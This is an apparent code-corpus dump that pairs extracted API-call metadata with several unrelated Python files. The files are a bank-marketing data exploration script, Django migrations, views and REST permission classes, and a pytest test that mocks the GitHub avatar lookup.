'load.load', (['save_dir'], {}), '(save_dir)\n', (5348, 5358), False, 'from tensorflow.python.saved_model import load\n'), ((6429, 6499), 'tensorflow_estimator.python.estimator.model_fn.EstimatorSpec', 'model_fn_lib.EstimatorSpec', (['ModeKeys.PREDICT'], {'predictions': '(features + 1)'}), '(ModeKeys.PREDICT, predictions=features + 1)\n', (6455, 6499), True, 'from tensorflow_estimator.python.estimator import model_fn as model_fn_lib\n'), ((7080, 7113), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (7111, 7113), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((7129, 7152), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (7149, 7152), False, 'from tensorflow.python.framework import constant_op\n'), ((7166, 7189), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(4)'], {}), '(4)\n', (7186, 7189), False, 'from tensorflow.python.framework import constant_op\n'), ((7779, 7812), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (7810, 7812), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((7828, 7851), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (7848, 7851), False, 'from tensorflow.python.framework import constant_op\n'), ((7865, 7888), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(6)'], {}), '(6)\n', (7885, 7888), False, 'from tensorflow.python.framework import constant_op\n'), ((8216, 8249), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (8247, 8249), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((8265, 8288), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (8285, 8288), False, 'from tensorflow.python.framework import constant_op\n'), ((9367, 9400), 'tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph', 'function._EstimatorWrappedGraph', ([], {}), '()\n', (9398, 9400), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((3259, 3282), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (3279, 3282), False, 'from tensorflow.python.framework import constant_op\n'), ((3284, 3307), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (3304, 3307), False, 'from tensorflow.python.framework import constant_op\n'), ((3469, 3492), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (3489, 3492), False, 'from tensorflow.python.framework import constant_op\n'), ((3494, 3517), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (3514, 3517), False, 'from tensorflow.python.framework import constant_op\n'), ((3601, 3625), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(10)'], {}), '(10)\n', (3621, 3625), False, 'from tensorflow.python.framework import constant_op\n'), ((3836, 3859), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(4)'], {}), '(4)\n', (3856, 3859), False, 'from tensorflow.python.framework import constant_op\n'), ((3861, 3884), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(6)'], {}), '(6)\n', (3881, 3884), False, 'from tensorflow.python.framework import constant_op\n'), ((4317, 4340), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(4)'], {}), '(4)\n', (4337, 4340), False, 'from tensorflow.python.framework import constant_op\n'), ((4727, 4750), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (4747, 4750), False, 'from tensorflow.python.framework import constant_op\n'), ((4752, 4775), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (4772, 4775), False, 'from tensorflow.python.framework import constant_op\n'), ((5139, 5162), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (5159, 5162), False, 'from tensorflow.python.framework import constant_op\n'), ((5164, 5187), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (5184, 5187), False, 'from tensorflow.python.framework import constant_op\n'), ((5205, 5229), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(10)'], {}), '(10)\n', (5225, 5229), False, 'from tensorflow.python.framework import constant_op\n'), ((5632, 5655), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (5652, 5655), False, 'from tensorflow.python.framework import constant_op\n'), ((5691, 5714), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (5711, 5714), False, 'from tensorflow.python.framework import constant_op\n'), ((5880, 5903), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (5900, 5903), False, 'from tensorflow.python.framework import constant_op\n'), ((5938, 5961), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (5958, 5961), False, 'from tensorflow.python.framework import constant_op\n'), ((6058, 6082), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(10)'], {}), '(10)\n', (6078, 6082), False, 'from tensorflow.python.framework import constant_op\n'), ((6351, 6375), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(23)'], {}), '(23)\n', (6371, 6375), False, 'from tensorflow.python.framework import constant_op\n'), ((8645, 8681), 'tensorflow.python.ops.array_ops.placeholder', 'array_ops.placeholder', (['dtypes.string'], {}), '(dtypes.string)\n', (8666, 8681), False, 'from tensorflow.python.ops import array_ops\n'), ((8701, 8737), 'tensorflow.python.ops.array_ops.placeholder', 'array_ops.placeholder', (['dtypes.string'], {}), '(dtypes.string)\n', (8722, 8737), False, 'from tensorflow.python.ops import array_ops\n'), ((8851, 8899), 'tensorflow.python.ops.string_ops.string_join', 'string_ops.string_join', (['[receiver_1, receiver_2]'], {}), '([receiver_1, receiver_2])\n', (8873, 8899), False, 'from tensorflow.python.ops import string_ops\n'), ((8916, 8942), 'tensorflow.python.ops.array_ops.identity', 'array_ops.identity', (['concat'], {}), '(concat)\n', (8934, 8942), False, 'from tensorflow.python.ops import array_ops\n'), ((9264, 9342), 'tensorflow_estimator.python.estimator.export.export_lib.ServingInputReceiver', 'export_lib.ServingInputReceiver', (['features', 'receiver_tensors', 'alternate_tensors'], {}), '(features, receiver_tensors, alternate_tensors)\n', (9295, 9342), False, 'from tensorflow_estimator.python.estimator.export import export_lib\n'), ((1815, 1833), 'tensorflow.python.util.compat.as_bytes', 'compat.as_bytes', (['x'], {}), '(x)\n', (1830, 1833), False, 'from tensorflow.python.util import compat\n'), ((2752, 2775), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (2772, 2775), False, 'from tensorflow.python.framework import constant_op\n'), ((2817, 2843), 'tensorflow.python.training.training.get_global_step', 'training.get_global_step', ([], {}), '()\n', (2841, 2843), False, 'from tensorflow.python.training import training\n'), ((4110, 4133), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (4130, 4133), False, 'from tensorflow.python.framework import constant_op\n'), ((4135, 4158), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (4155, 4158), False, 'from tensorflow.python.framework import constant_op\n'), ((4565, 4588), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (4585, 4588), False, 'from tensorflow.python.framework import constant_op\n'), ((4590, 4613), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (4610, 4613), False, 'from tensorflow.python.framework import constant_op\n'), ((4936, 4959), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (4956, 4959), False, 'from tensorflow.python.framework import constant_op\n'), ((4961, 4984), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (4981, 4984), False, 'from tensorflow.python.framework import constant_op\n'), ((8984, 9030), 'tensorflow.python.ops.string_ops.string_join', 'string_ops.string_join', (['[concat, concat2]', '""":"""'], {}), "([concat, concat2], ':')\n", (9006, 9030), False, 'from tensorflow.python.ops import string_ops\n'), ((9055, 9080), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['[1]'], {}), '([1])\n', (9075, 9080), False, 'from tensorflow.python.framework import constant_op\n'), ((9524, 9549), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""1"""'], {}), "('1')\n", (9544, 9549), False, 'from tensorflow.python.framework import constant_op\n'), ((9551, 9576), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""2"""'], {}), "('2')\n", (9571, 9576), False, 'from tensorflow.python.framework import constant_op\n'), ((2225, 2248), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (2245, 2248), False, 'from tensorflow.python.framework import constant_op\n'), ((6622, 6645), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (6642, 6645), False, 'from tensorflow.python.framework import constant_op\n'), ((9768, 9793), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""3"""'], {}), "('3')\n", (9788, 9793), False, 'from tensorflow.python.framework import constant_op\n'), ((2439, 2462), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (2459, 2462), False, 'from tensorflow.python.framework import constant_op\n'), ((2506, 2532), 'tensorflow.python.training.training.get_global_step', 'training.get_global_step', ([], {}), '()\n', (2530, 2532), False, 'from tensorflow.python.training import training\n'), ((6836, 6859), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (6856, 6859), False, 'from tensorflow.python.framework import constant_op\n'), ((6903, 6929), 'tensorflow.python.training.training.get_global_step', 'training.get_global_step', ([], {}), '()\n', (6927, 6929), False, 'from tensorflow.python.training import training\n'), ((9983, 10008), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""4"""'], {}), "('4')\n", (10003, 10008), False, 'from tensorflow.python.framework import constant_op\n'), ((10010, 10035), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""5"""'], {}), "('5')\n", (10030, 10035), False, 'from tensorflow.python.framework import constant_op\n')]
|
'''
Created on 10-Jul-2018
@author: <NAME>
'''
# We will use seaborn to create plots
import seaborn as sns
# Matplotlib will help us to draw the plots
import matplotlib.pyplot as plt
sns.set(color_codes=True)
# Import pandas to manage data set
import pandas as pd
# Import NumPy for all mathematics operations on numerical data
import numpy as np
# Let's load the pre-processed version of data set
file_name = 'bank_data_test.csv'
# Load into a variable using pandas read_csv
data = pd.read_csv(file_name, delimiter=',')
# Let's verify the size of data set
print('Number of Instances: %d\nNumber of attributes: %d'%(data.shape[0],data.shape[1]))
'''
Number of Instances: 41188
Number of attributes: 21
'''
# Let's see a brief summary of some variables
print(data.describe()[['age','duration','campaign','pdays']])
'''
age duration campaign pdays
count 41188.00000 41188.000000 41188.000000 41188.000000
mean 40.02406 258.285010 2.567593 962.475454
std 10.42125 259.279249 2.770014 186.910907
min 17.00000 0.000000 1.000000 0.000000
25% 32.00000 102.000000 1.000000 999.000000
50% 38.00000 180.000000 2.000000 999.000000
75% 47.00000 319.000000 3.000000 999.000000
max 98.00000 4918.000000 56.000000 999.000000
'''
# Let's extract the output variable using it's column name
y = data.y
# We will shuffle the data set before visualization
data = data.reindex(np.random.permutation(data.index))
# Here we will plot it, and count instances for different class
ax = sns.countplot(y,label="Count")
No, Yes= y.value_counts()
print('Number of to be subscriber: ',Yes)
print('Number of not to be subscriber : ',No)
'''
Number of to be subscriber: 36548
Number of not to be subscriber : 4640
'''
# Here show the created plots
plt.show()
# We will create 4 distribution plots
f, axes = plt.subplots(nrows=2,ncols=2, figsize=(15, 6))
# Monthly marketing activity
sns.distplot(data['month_integer'], kde=False, color="#ff3300", ax=axes[0][0]).set_title('Months of Marketing Activity Distribution')
axes[0][0].set_ylabel('Potential Clients Count')
axes[0][0].set_xlabel('Months')
# Potential subscriber on Age basis
sns.distplot(data['age'], kde=False, color="#3366ff", ax=axes[0][1]).set_title('Age of Potentical Clients Distribution')
axes[0][1].set_ylabel('Potential Clients Count')
axes[0][1].set_xlabel('Age')
# Potential subscriber on Job basis
sns.distplot(data['campaign'], kde=False, color="#546E7A", ax=axes[1][0]).set_title('Calls Received in the Marketing Campaign')
axes[1][0].set_ylabel('Potential Clients Count')
axes[1][0].set_xlabel('Campaign')
# Jobs
sns.distplot(data['job'], kde=False, color="#33ff66", ax=axes[1][1]).set_title('Potential clients on Job basis')
axes[1][1].set_ylabel('Potential Clients Count')
axes[1][1].set_xlabel('Job Type')
#Show all created plots
plt.show()
# We will first remove output variable from data
x = data
# Store output variable
y = data.y
# Now let's plot correlation between all the features
# Define figure size
f,ax = plt.subplots(figsize=(15, 15))
# Create correlation plot using seaborn
sns.heatmap(x.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax)
corr = x.corr()
# plot the correlations
plt.show()
# We will drop highly correlated features
drop_list = ['emp.var.rate','nr.employed','cons.price.idx','euribor3m','previous']
#Let's remove the redundant features
data = x.drop(drop_list,axis = 1)
print(data.columns)
'''
Index(['age', 'duration', 'campaign', 'pdays', 'cons.conf.idx', 'job',
'marital', 'education', 'default', 'housing', 'loan', 'contact',
'day_of_week', 'poutcome', 'y', 'month_integer'],
dtype='object')
'''
data.to_csv('bank_data_feat_select_test.csv')
|
[
"matplotlib.pyplot.show",
"pandas.read_csv",
"matplotlib.pyplot.subplots",
"seaborn.countplot",
"seaborn.distplot",
"numpy.random.permutation",
"seaborn.set"
] |
[((187, 212), 'seaborn.set', 'sns.set', ([], {'color_codes': '(True)'}), '(color_codes=True)\n', (194, 212), True, 'import seaborn as sns\n'), ((493, 530), 'pandas.read_csv', 'pd.read_csv', (['file_name'], {'delimiter': '""","""'}), "(file_name, delimiter=',')\n", (504, 530), True, 'import pandas as pd\n'), ((1634, 1665), 'seaborn.countplot', 'sns.countplot', (['y'], {'label': '"""Count"""'}), "(y, label='Count')\n", (1647, 1665), True, 'import seaborn as sns\n'), ((1901, 1911), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1909, 1911), True, 'import matplotlib.pyplot as plt\n'), ((1961, 2008), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'ncols': '(2)', 'figsize': '(15, 6)'}), '(nrows=2, ncols=2, figsize=(15, 6))\n', (1973, 2008), True, 'import matplotlib.pyplot as plt\n'), ((2966, 2976), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2974, 2976), True, 'import matplotlib.pyplot as plt\n'), ((3156, 3186), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 15)'}), '(figsize=(15, 15))\n', (3168, 3186), True, 'import matplotlib.pyplot as plt\n'), ((3336, 3346), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3344, 3346), True, 'import matplotlib.pyplot as plt\n'), ((1529, 1562), 'numpy.random.permutation', 'np.random.permutation', (['data.index'], {}), '(data.index)\n', (1550, 1562), True, 'import numpy as np\n'), ((2038, 2116), 'seaborn.distplot', 'sns.distplot', (["data['month_integer']"], {'kde': '(False)', 'color': '"""#ff3300"""', 'ax': 'axes[0][0]'}), "(data['month_integer'], kde=False, color='#ff3300', ax=axes[0][0])\n", (2050, 2116), True, 'import seaborn as sns\n'), ((2290, 2358), 'seaborn.distplot', 'sns.distplot', (["data['age']"], {'kde': '(False)', 'color': '"""#3366ff"""', 'ax': 'axes[0][1]'}), "(data['age'], kde=False, color='#3366ff', ax=axes[0][1])\n", (2302, 2358), True, 'import seaborn as sns\n'), ((2526, 2599), 'seaborn.distplot', 'sns.distplot', (["data['campaign']"], {'kde': '(False)', 'color': '"""#546E7A"""', 'ax': 'axes[1][0]'}), "(data['campaign'], kde=False, color='#546E7A', ax=axes[1][0])\n", (2538, 2599), True, 'import seaborn as sns\n'), ((2745, 2813), 'seaborn.distplot', 'sns.distplot', (["data['job']"], {'kde': '(False)', 'color': '"""#33ff66"""', 'ax': 'axes[1][1]'}), "(data['job'], kde=False, color='#33ff66', ax=axes[1][1])\n", (2757, 2813), True, 'import seaborn as sns\n')]
|
# Generated by Django 2.2.2 on 2019-09-25 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sensors', '0003_auto_20190924_2227'),
]
operations = [
migrations.AlterField(
model_name='cameradata',
name='filename',
field=models.FileField(help_text='Camera video file', upload_to='camera/'),
),
migrations.AlterField(
model_name='cameradata',
name='framerate',
field=models.CharField(choices=[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25), ('NTSC', 29.97), ('Web', 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), ('High', 60)], default='Film', help_text='Video framerate', max_length=9),
),
migrations.AlterField(
model_name='wearabledata',
name='filename',
field=models.FileField(help_text='Wearable data file', upload_to='wearable/'),
),
]
|
[
"django.db.models.FileField",
"django.db.models.CharField"
] |
[((342, 410), 'django.db.models.FileField', 'models.FileField', ([], {'help_text': '"""Camera video file"""', 'upload_to': '"""camera/"""'}), "(help_text='Camera video file', upload_to='camera/')\n", (358, 410), False, 'from django.db import migrations, models\n'), ((539, 762), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25), ('NTSC', 29.97), ('Web', \n 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), ('High', 60)]", 'default': '"""Film"""', 'help_text': '"""Video framerate"""', 'max_length': '(9)'}), "(choices=[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25),\n ('NTSC', 29.97), ('Web', 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), (\n 'High', 60)], default='Film', help_text='Video framerate', max_length=9)\n", (555, 762), False, 'from django.db import migrations, models\n'), ((883, 954), 'django.db.models.FileField', 'models.FileField', ([], {'help_text': '"""Wearable data file"""', 'upload_to': '"""wearable/"""'}), "(help_text='Wearable data file', upload_to='wearable/')\n", (899, 954), False, 'from django.db import migrations, models\n')]
|
from django.shortcuts import render,redirect
from .forms import OrganizationRegisterForm,CreateEventForm,AddImageForm,AddOrgImage
from .models import Organization,OrganizationImages
from django.contrib.auth.models import User
from django.contrib import messages
from evelist.models import Event,EventImages
from volunteer.models import City,Volunteer
from django.db.models import F
# Create your views here.
def signup(request):
if request.method == 'POST':
form = OrganizationRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
o_name = form.cleaned_data.get('name')
o_vision= form.cleaned_data.get('vision')
o_mission= form.cleaned_data.get('mission')
o_link=form.cleaned_data.get('link')
t_user=User.objects.filter(username=username).first()
p=Organization(user=t_user,name=o_name,vision=o_vision,mission=o_mission,link=o_link)
p.save()
messages.success(request, f'Account created for {username}!')
return redirect('register')
else:
form = OrganizationRegisterForm()
return render(request, 'organization/signup.html', {'form': form})
def cenv(request):
if request.method == 'POST':
form1=CreateEventForm(request.POST,request.FILES)
if form1.is_valid():
new_event=form1.save(commit=False)
new_event.organizer=request.user.organization
new_event.save()
return redirect('add_img')
else:
form1=CreateEventForm()
return render(request, 'organization/cenv.html',{'form': form1})
def aenv(request):
c_organization=request.user.organization
allevents=Event.objects.filter(organizer=c_organization)
context={
"events":allevents
}
return render(request, 'organization/aenv.html',context)
def changep(request):
if request.method == 'POST':
form2=AddOrgImage(request.POST,request.FILES)
if form2.is_valid():
new_org=form2.save(commit=False)
new_org.organization=request.user.organization
new_org.save()
return redirect('change_profile')
else:
form2=AddOrgImage()
return render(request, 'organization/changep.html',{'form': form2})
def a_image(request):
if request.method == 'POST':
form2=AddImageForm(request.POST,request.FILES)
if form2.is_valid():
form2.save()
return redirect('add_img')
else:
form2=AddImageForm()
return render(request, 'organization/a_image.html',{'form': form2})
def printo(request):
if request.method == 'GET':
o_org=request.GET.get('org')
org=Organization.objects.filter(name=o_org).first()
images=OrganizationImages.objects.filter(organization=org)
context={
"name":org.name,
"vision":org.vision,
"mission":org.mission,
"link":org.link,
"img":images,
}
return render(request, 'organization/orgview.html',context)
def v_name(request):
if request.method == 'GET':
event=request.GET.get('event')
x=Event.objects.get(name=event).volunteers.all()
context={
'volunname':x,
}
return render(request,'organization/vname.html',context)
def upvote(request):
if request.method == 'GET':
volun=request.GET.get('volunteer')
c_user=User.objects.filter(username=volun).first()
c_vol=Volunteer.objects.filter(user=c_user).update(upvote=F('upvote')+1)
messages.success(request, f'successfully upvoted for {c_user}!')
return redirect('all_event')
|
[
"django.shortcuts.redirect",
"volunteer.models.Volunteer.objects.filter",
"django.contrib.auth.models.User.objects.filter",
"django.db.models.F",
"evelist.models.Event.objects.filter",
"evelist.models.Event.objects.get",
"django.shortcuts.render",
"django.contrib.messages.success"
] |
[((1075, 1134), 'django.shortcuts.render', 'render', (['request', '"""organization/signup.html"""', "{'form': form}"], {}), "(request, 'organization/signup.html', {'form': form})\n", (1081, 1134), False, 'from django.shortcuts import render, redirect\n'), ((1438, 1496), 'django.shortcuts.render', 'render', (['request', '"""organization/cenv.html"""', "{'form': form1}"], {}), "(request, 'organization/cenv.html', {'form': form1})\n", (1444, 1496), False, 'from django.shortcuts import render, redirect\n'), ((1568, 1614), 'evelist.models.Event.objects.filter', 'Event.objects.filter', ([], {'organizer': 'c_organization'}), '(organizer=c_organization)\n', (1588, 1614), False, 'from evelist.models import Event, EventImages\n'), ((1658, 1708), 'django.shortcuts.render', 'render', (['request', '"""organization/aenv.html"""', 'context'], {}), "(request, 'organization/aenv.html', context)\n", (1664, 1708), False, 'from django.shortcuts import render, redirect\n'), ((2009, 2070), 'django.shortcuts.render', 'render', (['request', '"""organization/changep.html"""', "{'form': form2}"], {}), "(request, 'organization/changep.html', {'form': form2})\n", (2015, 2070), False, 'from django.shortcuts import render, redirect\n'), ((2278, 2339), 'django.shortcuts.render', 'render', (['request', '"""organization/a_image.html"""', "{'form': form2}"], {}), "(request, 'organization/a_image.html', {'form': form2})\n", (2284, 2339), False, 'from django.shortcuts import render, redirect\n'), ((2668, 2721), 'django.shortcuts.render', 'render', (['request', '"""organization/orgview.html"""', 'context'], {}), "(request, 'organization/orgview.html', context)\n", (2674, 2721), False, 'from django.shortcuts import render, redirect\n'), ((2899, 2950), 'django.shortcuts.render', 'render', (['request', '"""organization/vname.html"""', 'context'], {}), "(request, 'organization/vname.html', context)\n", (2905, 2950), False, 'from django.shortcuts import render, redirect\n'), ((3240, 3261), 'django.shortcuts.redirect', 'redirect', (['"""all_event"""'], {}), "('all_event')\n", (3248, 3261), False, 'from django.shortcuts import render, redirect\n'), ((3167, 3231), 'django.contrib.messages.success', 'messages.success', (['request', 'f"""successfully upvoted for {c_user}!"""'], {}), "(request, f'successfully upvoted for {c_user}!')\n", (3183, 3231), False, 'from django.contrib import messages\n'), ((930, 991), 'django.contrib.messages.success', 'messages.success', (['request', 'f"""Account created for {username}!"""'], {}), "(request, f'Account created for {username}!')\n", (946, 991), False, 'from django.contrib import messages\n'), ((1002, 1022), 'django.shortcuts.redirect', 'redirect', (['"""register"""'], {}), "('register')\n", (1010, 1022), False, 'from django.shortcuts import render, redirect\n'), ((1377, 1396), 'django.shortcuts.redirect', 'redirect', (['"""add_img"""'], {}), "('add_img')\n", (1385, 1396), False, 'from django.shortcuts import render, redirect\n'), ((1945, 1971), 'django.shortcuts.redirect', 'redirect', (['"""change_profile"""'], {}), "('change_profile')\n", (1953, 1971), False, 'from django.shortcuts import render, redirect\n'), ((2220, 2239), 'django.shortcuts.redirect', 'redirect', (['"""add_img"""'], {}), "('add_img')\n", (2228, 2239), False, 'from django.shortcuts import render, redirect\n'), ((3046, 3081), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'volun'}), '(username=volun)\n', (3065, 3081), False, 'from django.contrib.auth.models import User\n'), ((3098, 3135), 'volunteer.models.Volunteer.objects.filter', 'Volunteer.objects.filter', ([], {'user': 'c_user'}), '(user=c_user)\n', (3122, 3135), False, 'from volunteer.models import City, Volunteer\n'), ((779, 817), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'username'}), '(username=username)\n', (798, 817), False, 'from django.contrib.auth.models import User\n'), ((2810, 2839), 'evelist.models.Event.objects.get', 'Event.objects.get', ([], {'name': 'event'}), '(name=event)\n', (2827, 2839), False, 'from evelist.models import Event, EventImages\n'), ((3150, 3161), 'django.db.models.F', 'F', (['"""upvote"""'], {}), "('upvote')\n", (3151, 3161), False, 'from django.db.models import F\n')]
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import BasePermission
from rest_framework.exceptions import PermissionDenied
from mkt.comm.models import (CommunicationNote, CommunicationThread,
user_has_perm_note, user_has_perm_thread)
class ThreadPermission(BasePermission):
"""
Permission wrapper for checking if the authenticated user has the
permission to view the thread.
"""
def has_permission(self, request, view):
# Let `has_object_permission` handle the permissions when we retrieve
# an object.
if view.action == 'retrieve':
return True
if not request.user.is_authenticated():
raise PermissionDenied()
return True
def has_object_permission(self, request, view, obj):
"""
Make sure we give correct permissions to read/write the thread.
"""
if not request.user.is_authenticated() or obj.read_permission_public:
return obj.read_permission_public
return user_has_perm_thread(obj, request.user)
class NotePermission(ThreadPermission):
def has_permission(self, request, view):
thread_id = view.kwargs.get('thread_id')
if not thread_id and view.kwargs.get('note_id'):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
thread_id = note.thread_id
# We save the thread in the view object so we can use it later.
view.comm_thread = get_object_or_404(
CommunicationThread, id=thread_id)
return ThreadPermission.has_object_permission(
self, request, view, view.comm_thread)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
return user_has_perm_note(obj, request.user)
class AttachmentPermission(NotePermission):
def has_permission(self, request, view):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
class EmailCreationPermission(object):
"""Permit if client's IP address is allowed."""
def has_permission(self, request, view):
auth_token = request.META.get('HTTP_POSTFIX_AUTH_TOKEN')
if auth_token and auth_token not in settings.POSTFIX_AUTH_TOKEN:
return False
remote_ip = request.META.get('REMOTE_ADDR')
return remote_ip and (
remote_ip in settings.ALLOWED_CLIENTS_EMAIL_API)
|
[
"rest_framework.exceptions.PermissionDenied",
"django.shortcuts.get_object_or_404",
"mkt.comm.models.user_has_perm_note",
"mkt.comm.models.CommunicationNote.objects.get",
"mkt.comm.models.user_has_perm_thread"
] |
[((1101, 1140), 'mkt.comm.models.user_has_perm_thread', 'user_has_perm_thread', (['obj', 'request.user'], {}), '(obj, request.user)\n', (1121, 1140), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((1550, 1602), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['CommunicationThread'], {'id': 'thread_id'}), '(CommunicationThread, id=thread_id)\n', (1567, 1602), False, 'from django.shortcuts import get_object_or_404\n'), ((1869, 1906), 'mkt.comm.models.user_has_perm_note', 'user_has_perm_note', (['obj', 'request.user'], {}), '(obj, request.user)\n', (1887, 1906), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((2014, 2070), 'mkt.comm.models.CommunicationNote.objects.get', 'CommunicationNote.objects.get', ([], {'id': "view.kwargs['note_id']"}), "(id=view.kwargs['note_id'])\n", (2043, 2070), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((2296, 2352), 'mkt.comm.models.CommunicationNote.objects.get', 'CommunicationNote.objects.get', ([], {'id': "view.kwargs['note_id']"}), "(id=view.kwargs['note_id'])\n", (2325, 2352), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((767, 785), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (783, 785), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((1354, 1410), 'mkt.comm.models.CommunicationNote.objects.get', 'CommunicationNote.objects.get', ([], {'id': "view.kwargs['note_id']"}), "(id=view.kwargs['note_id'])\n", (1383, 1410), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n')]
|
import pytest as pytest
from unittest.mock import Mock
from marginTrading import github_api
@pytest.fixture
def avatar_url(mocker):
resp_mock = Mock()
url = 'https://avatars.githubusercontent.com/u/78605825?v=4'
resp_mock.json.return_value = {'login': 'sambiase', 'id': 78605825, 'node_id': 'MDQ6VXNlcjc4NjA1ODI1',
'avatar_url': url}
get_mock = mocker.patch('marginTrading.github_api.requests.get')
get_mock.return_value = resp_mock
return url
def teste_buscar_avatar(avatar_url):
url = github_api.buscar_avatar('sambiase')
assert avatar_url == url
def teste_buscar_avatar_integracao():
url = github_api.buscar_avatar('sambiase')
assert 'https://avatars.githubusercontent.com/u/78605825?v=4' == url
|
[
"marginTrading.github_api.buscar_avatar",
"unittest.mock.Mock"
] |
